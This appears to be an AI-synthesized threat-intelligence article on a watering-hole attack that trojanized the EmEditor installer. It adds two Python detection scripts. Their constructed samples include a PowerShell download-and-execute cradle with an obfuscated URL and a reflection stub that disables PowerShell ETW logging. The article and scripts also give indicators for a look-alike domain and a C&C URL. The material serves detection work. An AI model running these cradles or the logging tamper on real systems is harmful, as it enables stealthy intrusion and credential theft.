VYPR
Breach · Published Jan 22, 2026 · Updated May 20, 2026 · 1 source

Compromised EmEditor Installer Used in Watering Hole Attack Delivers Multi-Stage Info-Stealing Malware

A watering hole attack compromised the EmEditor download page, distributing a trojanized installer that deploys multi-stage PowerShell-based malware for credential theft, system fingerprinting, screenshot capture, and data exfiltration.

In late December 2025, Emurasoft, the U.S.-based developer of the widely used EmEditor text editor, issued a security advisory warning users that the product's download page had been compromised. Attackers had modified the installer to deliver a multi-stage malware payload, so users who downloaded the software from the official website received the malicious build. The attack, analyzed by Trend Micro Research, highlights the growing risk of software supply chain compromises, particularly those targeting developer tools.

The compromised installer, a modified .MSI file, runs a PowerShell command during installation that retrieves first-stage code from a look-alike domain chosen to pass as the vendor's own (EmEditorjp[.]com). That first stage then fetches the two main malicious scripts from two further URLs. Both scripts are obfuscated: URLs, commands and other strings are assembled at runtime with .NET string methods (Insert, Remove, Replace, Substring and Trim) rather than stored as literals, so signature matching on the static script text misses them.

The two main payloads have distinct roles. One disables PowerShell's Event Tracing for Windows (ETW) provider so that its subsequent script activity goes unlogged, steals credentials from the Windows Credential Manager, enumerates installed security software, runs anti-virtualization checks, and captures screenshots. The other handles system fingerprinting, geofencing, command-and-control (C&C) reporting, data exfiltration, and registry checks for security applications.
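Both behaviours described above, the piecewise string assembly and the ETW disable, are visible in PowerShell script block logs as long as logging is on before the tamper lands. The Python triage script below is an added example written for this page, not code from Trend Micro or from the malware: it scores script-block text for dense use of the listed .NET string methods feeding an invoke or download, and for reflection into PowerShell's ETW provider. The sample blocks are constructed, and the ETW pattern it looks for (PSEtwLogProvider / m_enabled) is an assumed representative technique, since the article does not show the malware's own code.

```python
"""Triage heuristics for PowerShell script-block log text (Event ID 4104 bodies):
runtime string assembly with .NET string methods feeding an invoke or download,
and tampering with PowerShell's ETW provider. Added example; samples are constructed."""
import re
from dataclasses import dataclass, field

# The .NET string methods the article lists as the obfuscation primitives.
STRING_METHODS = ("Insert", "Remove", "Replace", "Substring", "Trim")

# PowerShell allows quoted method names (."Insert"(...)), so tolerate optional quotes.
METHOD_CALL = re.compile(
    r"\.\s*[\"']?(" + "|".join(STRING_METHODS) + r")[\"']?\s*\(", re.IGNORECASE)
INVOKE = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
DOWNLOAD = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b"
    r"|Invoke-RestMethod|\birm\b", re.IGNORECASE)
# Assumed indicator for the ETW-disable step: the widely documented reflection into
# PSEtwLogProvider / EventProvider.m_enabled. The article does not show the malware's
# own code, so treat this as one representative pattern, not a signature.
ETW_TAMPER = re.compile(
    r"PSEtwLogProvider|System\.Diagnostics\.Eventing\.EventProvider|\bm_enabled\b",
    re.IGNORECASE)

ALERT_SCORE = 4  # tuning knob: one strong signal or a combination of weak ones alerts


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points: int, reason: str) -> None:
        self.score += points
        self.reasons.append(reason)


def assess_script_block(script: str, call_threshold: int = 4) -> Verdict:
    """Score one script block. Legitimate scripts use Trim()/Replace() too, so a
    high call count only matters together with something that executes the result."""
    v = Verdict()
    calls = [m.group(1).lower() for m in METHOD_CALL.finditer(script)]
    many_calls = len(calls) >= call_threshold
    if many_calls:
        v.add(2, f"{len(calls)} string-method calls: {', '.join(sorted(set(calls)))}")
    if INVOKE.search(script):
        v.add(1, "Invoke-Expression / IEX present")
    if DOWNLOAD.search(script):
        v.add(1, "network download primitive present")
    if many_calls and (INVOKE.search(script) or DOWNLOAD.search(script)):
        v.add(2, "assembled string feeds an invoke or download")
    if ETW_TAMPER.search(script):
        v.add(4, "reflection into PowerShell ETW provider (logging tamper)")
    return v


def triage(blocks: dict) -> dict:
    """Return only the blocks scoring at or above ALERT_SCORE, keyed by name."""
    verdicts = {name: assess_script_block(text) for name, text in blocks.items()}
    return {name: v for name, v in verdicts.items() if v.score >= ALERT_SCORE}


# Constructed samples: an ordinary admin one-liner, a staged download that assembles
# its URL piecewise, and an ETW-disable stub. None of these is the real payload.
SAMPLE_SCRIPT_BLOCKS = {
    "benign": "Get-ChildItem $env:TEMP | Where-Object { $_.Name.Trim() -ne '' } | Remove-Item",
    "staged_download": (
        "$h='hxxps://'.Replace('xx','tt');"
        "$d='ZZexample.invalidZZ'.Remove(0,2).Substring(0,15).Trim();"
        "$p='/a/b'.Insert(2,'stage1');"
        "IEX (New-Object Net.WebClient).DownloadString($h+$d+$p)"
    ),
    "etw_disable": (
        "$p=[Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')"
        ".GetField('etwProvider','NonPublic,Static').GetValue($null);"
        "[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance')"
        ".SetValue($p,0)"
    ),
}

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{name}: score={verdict.score}")
        for reason in verdict.reasons:
            print(f"  - {reason}")
```

The scoring deliberately requires the string assembly to be paired with an invoke or download primitive before it carries weight, because Trim and Replace are everywhere in benign administration scripts; the ETW reflection pattern alerts on its own because there is no legitimate reason for a script to reach into that provider.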

The geofencing logic excludes countries including Armenia, Belarus, Georgia, Kazakhstan, and Kyrgyzstan, and on that basis researchers assess the operators are likely based in Russia or elsewhere in the Commonwealth of Independent States (CIS). Skipping CIS victims is a common practice among crimeware groups from the region, intended to reduce legal and operational risk at home. The malware reports collected information to a C&C server at hxxps://cachingdrive[.]com/gate/init/2daef8cd; the fixed trailing string "2daef8cd" may serve as a campaign identifier.

EmEditor has longstanding recognition within Japanese developer communities as a recommended Windows editor, suggesting the attackers may have been targeting that user base specifically. The timing of the compromise during the year-end holiday period may also have been deliberate, since reduced staffing and more relaxed routines increase the likelihood of security lapses. At the time of the advisory, several accesses of the malicious URL by EmEditor users had already been recorded, indicating that some users were likely compromised before the company's announcement.

This incident undermines the assumption that software from trusted vendors can be deprioritized during security triage. Any organization running Windows-based third-party software obtained through public download channels is exposed to this risk. CISOs should ensure that process activity spawned by trusted installers and developer tools, such as an MSI installer launching PowerShell that then reaches out to the network, is monitored rather than implicitly trusted. Trend Micro's TrendAI Vision One detects and blocks the indicators of compromise discussed in the research.
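The chain the article describes, an MSI installer launching PowerShell, a look-alike vendor domain, and a fixed C&C URL, lends itself to simple correlation rules over endpoint telemetry. The Python below is an added example written for this page, not Trend Micro's detection content: it runs three rules over constructed Sysmon-style events (installer-spawned script host, look-alike vendor domain, known C&C host or path). The event field names, the assumption that only emeditor.com and its subdomains count as vendor-owned, and the sample events themselves are all constructed for the example.

```python
"""Correlation rules for the installer-to-network chain in the article, run over
constructed Sysmon-style events. Added example; field names, the vendor-domain
allowlist and the sample events are assumptions, not any vendor's telemetry schema."""
import re
from urllib.parse import urlsplit

INSTALLER_HOSTS = {"msiexec.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
# Download-cradle / encoded-command markers that raise an installer-spawned
# script host from "medium" (review) to "high".
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b"
    r"|Invoke-RestMethod|\biex\b|Invoke-Expression|-enc(?:odedcommand)?\b"
    r"|FromBase64String", re.IGNORECASE)

# Assumption: only emeditor.com and its subdomains are the vendor's own; any other
# host containing the brand string (the article's EmEditorjp[.]com) is a look-alike.
VENDOR_BRANDS = {"emeditor": {"emeditor.com"}}
# Reported C&C host and the /gate/init/<8 hex> path shape from the article.
KNOWN_C2_HOSTS = {"cachingdrive.com"}
KNOWN_C2_PATH = re.compile(r"^/gate/init/[0-9a-f]{8}$")


def image_name(path: str) -> str:
    """Lower-cased basename of a Windows image path (Sysmon logs full paths)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_vendor_owned(host: str, legit: set) -> bool:
    return any(host == d or host.endswith("." + d) for d in legit)


def classify_host(host: str):
    """'known-c2', 'lookalike', or None for a DNS name or URL host."""
    host = host.lower().rstrip(".")
    if host in KNOWN_C2_HOSTS:
        return "known-c2"
    for brand, legit in VENDOR_BRANDS.items():
        if brand in host and not is_vendor_owned(host, legit):
            return "lookalike"
    return None


def detect(events):
    """Return (event_index, rule, severity) tuples for events matching a rule."""
    alerts = []
    for i, ev in enumerate(events):
        kind = ev["event"]
        if kind == "process_create":
            parent = image_name(ev["parent_image"])
            child = image_name(ev["image"])
            # Installers legitimately run helper msiexec instances; a script host
            # with a download cradle on its command line is the tell here.
            if parent in INSTALLER_HOSTS and child in SCRIPT_HOSTS:
                sev = "high" if CRADLE.search(ev.get("command_line", "")) else "medium"
                alerts.append((i, "installer-spawned-script-host", sev))
        elif kind == "dns_query":
            verdict = classify_host(ev["query"])
            if verdict:
                alerts.append((i, f"dns-{verdict}", "high" if verdict == "known-c2" else "medium"))
        elif kind == "http_request":
            url = urlsplit(ev["url"])
            verdict = classify_host(url.hostname or "")
            if verdict == "known-c2" or KNOWN_C2_PATH.match(url.path):
                alerts.append((i, "c2-beacon", "high"))
            elif verdict == "lookalike":
                alerts.append((i, "http-lookalike", "medium"))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSI = r"C:\Windows\System32\msiexec.exe"
# Constructed events in the order an install would produce them.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": MSI, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'msiexec.exe /i "C:\Users\u\Downloads\EmEditor.msi"'},
    # Custom-action helper: msiexec spawning msiexec is normal and must not alert.
    {"event": "process_create", "image": MSI, "parent_image": MSI, "command_line": "msiexec.exe /V"},
    {"event": "process_create", "image": PS, "parent_image": MSI,
     "command_line": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('https://example.invalid/s1')\""},
    {"event": "dns_query", "image": MSI, "query": "jp.emeditor.com"},
    {"event": "dns_query", "image": PS, "query": "emeditorjp.com"},
    {"event": "http_request", "image": PS, "url": "https://cachingdrive.com/gate/init/2daef8cd"},
    # Same cradle under explorer.exe: outside this rule set (installer lineage only).
    {"event": "process_create", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')\""},
]

if __name__ == "__main__":
    for idx, rule, sev in detect(SAMPLE_EVENTS):
        print(f"[{sev:6}] event {idx}: {rule}")
```

The installer-lineage rule is the one that generalizes beyond this campaign: the look-alike and C&C rules only catch this infrastructure, while msiexec.exe launching a script host that immediately downloads code is anomalous for almost any legitimate installer and would have fired here before any indicator was published.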

Synthesized by Vypr AI